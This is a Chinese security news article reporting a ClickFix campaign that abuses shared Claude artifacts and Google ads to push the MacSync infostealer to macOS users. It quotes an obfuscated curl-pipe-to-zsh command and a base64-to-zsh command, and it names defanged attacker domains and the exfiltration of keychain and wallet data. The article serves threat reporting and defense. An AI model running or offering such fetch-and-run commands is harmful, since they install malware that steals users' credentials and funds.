文章总结： 研究人员发现黑客滥用Claude共享内容功能结合谷歌广告发起ClickFix攻击，诱导macOS用户执行恶意Shell命令以分发MacSync信息窃取木马。攻击通过伪造在线工具搜索结果或冒充苹果支持页面实现，已吸引超1.5万次浏览，窃取钥匙串、浏览器数据及加密货币钱包等信息。建议用户避免执行不明命令并向AI验证安全性。 综合评分： 85 文章分类： 恶意软件,威胁情报,AI安全,安全大事件,网络安全

黑客滥用Claude发动ClickFix攻击 向macOS用户分发信息窃取木马

胡金鱼 胡金鱼

嘶吼专业版

2026年2月25日 14:01 北京

黑客正借助Claude共享内容与谷歌广告发起ClickFix攻击，向搜索特定关键词的macOS用户分发信息窃取类恶意软件。研究人员已在野外发现至少两种攻击变体，超过1万名用户访问过包含危险指令的恶意内容。

Claude 共享内容（Claude artifact）是指由用户通过Anthropic大语言模型生成并公开的内容，形式包括指令、教程、代码片段等。这类内容独立于主对话界面，任何人都可通过claude.ai域名下的链接直接访问。

该类页面会提示用户：所展示内容由用户生成，未经准确性验证。

研究人员发现，在谷歌搜索中，“在线DNS解析器”“macOS命令行磁盘空间分析工具”“HomeBrew”等关键词均出现了恶意推广结果。

恶意 HomeBrew 搜索结果

这些搜索结果会跳转到公开的Claude共享内容，或冒充苹果官方支持的Medium文章。两种页面都会诱导用户在终端中粘贴并执行Shell命令。

第一种攻击变体诱导执行的命令为：

echo “…” | base64 -D | zsh

第二种为：

true && cur””l -SsLfk –compressed “https://raxelpak[.]com/curl/[hash]” | zsh

第二种攻击变体使用伪造苹果支持页面

研究人员发现，该恶意Claude教程页面浏览量已至少达到15600次，这一数据可大致反映受骗用户规模。根据几天前观测到的该页面显示，浏览量为12300次。

Claude 对话中托管的 ClickFix 攻击引导页面

在终端执行上述命令后，系统会下载一个MacSync信息窃取木马的加载器，用于窃取设备上的敏感数据。

研究人员表示，该木马使用硬编码令牌与API密钥连接命令与控制（C2）基础设施，并伪造macOS浏览器UA以伪装成正常流量。

命令执行结果会直接传递给osascript，由AppleScript负责执行实际的窃取行为，包括钥匙串、浏览器数据、加密货币钱包等信息。”

窃取的数据会打包为/tmp/osalogging.zip，通过HTTP POST请求上传至攻击者C2服务器a2abotnet[.]com/gate。若传输失败，压缩包会被拆分为多个小块并重试8次。上传成功后，程序会执行清理操作，抹除所有痕迹。

两种攻击变体均从同一C2地址下载第二阶段载荷，表明背后是同一威胁组织所为。 此前已有类似攻击活动利用ChatGPT、Grok的对话分享功能分发AMOS信息窃取木马。2025年12月，研究人员就发现攻击者利用ChatGPT与Grok对话分享链接，针对macOS用户发动ClickFix攻击。

此次攻击开始滥用Claude，表明大模型滥用已扩散至更多主流平台。安全研究人员提醒用户保持谨慎，不要在终端执行来源不明或无法完全理解的命令。而在同一对话中向聊天机器人询问命令是否安全，是简单有效的判断方法。

参考及来源：https://www.bleepingcomputer.com/news/security/claude-llm-artifacts-abused-to-push-mac-infostealers-in-clickfix-attack/

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：嘶吼专业版 胡金鱼 胡金鱼《黑客滥用Claude发动ClickFix攻击 向macOS用户分发信息窃取木马》